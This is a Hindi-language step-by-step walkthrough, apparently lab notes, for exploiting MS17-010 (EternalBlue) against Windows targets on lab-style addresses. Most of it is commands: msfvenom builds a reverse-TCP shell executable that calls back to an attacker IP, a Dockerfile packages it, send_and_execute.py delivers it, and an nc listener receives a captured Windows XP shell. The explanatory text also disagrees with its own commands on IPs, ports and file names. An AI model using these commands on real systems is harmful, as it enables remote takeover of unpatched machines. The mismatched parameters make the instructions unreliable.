
MS17-010_CVE-2017-0143
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2017-0143
msfvenom का उपयोग करके पेलोड जनरेट करना:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=1337 -f exe -o ms17-010.exe
-p windows/shell_reverse_tcp: पेलोड निर्दिष्ट करता है (विंडोज के लिए एक रिवर्स टीसीपी शेल)।LHOST=10.10.14.4: हमलावर का आईपी पता (जहां लक्ष्य वापस कनेक्ट होगा)।LPORT=443: हमलावर की मशीन पर कनेक्शन सुनने के लिए पोर्ट।-f exe: पेलोड को एक्जीक्यूटेबल फाइल के रूप में आउटपुट करता है।-a x86: आर्किटेक्चर निर्दिष्ट करता है (32-बिट)।-o rev.exe: पेलोड को rev.exe के रूप में सहेजता है।डॉकर कंटेनर सेट करना:
डॉकर सेट करने के चरण:
sudo apt-get install docker.io
फोल्डर संरचना बनाएं:
mkdir exploit
cd exploit
touch Dockerfile
echo "impacket==0.9.23" > requirements.txt
Dockerfile: डॉकर कंटेनर बनाने के निर्देश शामिल हैं।requirements.txt: पायथन निर्भरताएँ सूचीबद्ध करता है (जैसे, impacket)।Dockerfile लिखें:
FROM python:2.7-alpine
RUN apk --update --no-cache add \
git \
zlib-dev \
musl-dev \
libc-dev \
gcc \
libffi-dev \
openssl-dev && \
rm -rf /var/cache/apk/*
RUN mkdir -p /opt/exploit
COPY requirements.txt /opt/exploit
COPY ms17-010.exe /opt/exploit
WORKDIR /opt/exploit
RUN pip install -r requirements.txt
FROM python:2.7-alpine: पायथन 2.7 के साथ एक हल्की Alpine Linux इमेज का उपयोग करता है।RUN apk --update --no-cache add: आवश्यक निर्भरताएँ स्थापित करता है (जैसे, git, gcc)।COPY rev.exe /opt/cattime: रिवर्स शेल एक्जीक्यूटेबल (rev.exe) को कंटेनर में कॉपी करता है।RUN pip install -r requirements.txt: पायथन निर्भरताएँ स्थापित करता है (जैसे, impacket)।डॉकर कंटेनर बनाएं:
sudo docker build -t exploit .
कंटेनर चलाएं:
sudo docker run -it exploit /bin/sh
एक्सप्लॉइट डाउनलोड और चलाना:
git clone https://github.com/h3x0v3rl0rd/MS17-010_CVE-2017-0143.git
cd MS17-010_CVE-2017-0143
python send_and_execute.py 10.10.10.4 ../ms17-010.exe
रिवर्स शेल:
nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.4] 1035
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
git clone https://github.com/h3x0v3rl0rd/MS17-010_CVE-2017-0143.git
cd MS17-010_CVE-2017-0143/
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.9 LPORT=1337 -f exe -o ms17-010.exe
एक nc लिसनर बनाएं
nc -nlvp 1337
python2.7 send_and_execute.py 10.129.163.162 ms17-010.exe

यदि आपको ऐसी कोई त्रुटि मिलती है तो इन चरणों का पालन करें:
cd MS17-010_CVE-2017-0143/
sudo python2.7 get-pip.py
pip2.7 install --upgrade setuptools
python2.7 -m pip install impacket
अब हम एक्सप्लॉइट चला सकते हैं:


अब यह एक्सप्लॉइट python2 में बनाया गया है और इसे impacket, pycrypto जैसी कुछ लाइब्रेरीज़ की आवश्यकता है। इसके लिए वर्चुअल एनवायरनमेंट सेट करना होता है और यहाँ virtualenv प्रोग्राम मदद करता है। एक बार आप एनवायरनमेंट बना लें तो फिर आप source यूटिलिटी प्रोग्राम का उपयोग करके उस एनवायरनमेंट को सक्रिय कर सकते हैं। यहाँ python2 का उपयोग इंटरप्रेटर के रूप में किया जाता है क्योंकि नवीनतम Kali में python3 को ग्लोबल इंटरप्रेटर के रूप में सेट किया गया है और हमारा एक्सप्लॉइट python2 में है।
हम वर्चुअल एनवायरनमेंट का उपयोग क्यों करते हैं? इसके लिए आप यह देख सकते हैं। https://www.dabapps.com/blog/introduction-to-pip-and-virtualenv-python/
virtualenv -p python2 venv
source venv/bin/activate
pip install impacket
pip install pycrypto


python checker.py 10.10.10.4

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.12 LPORT=4445 -f exe > shell.exe

python send_and_execute.py 10.10.10.4 shell.exe 445 browser

nc -nlvp 4445
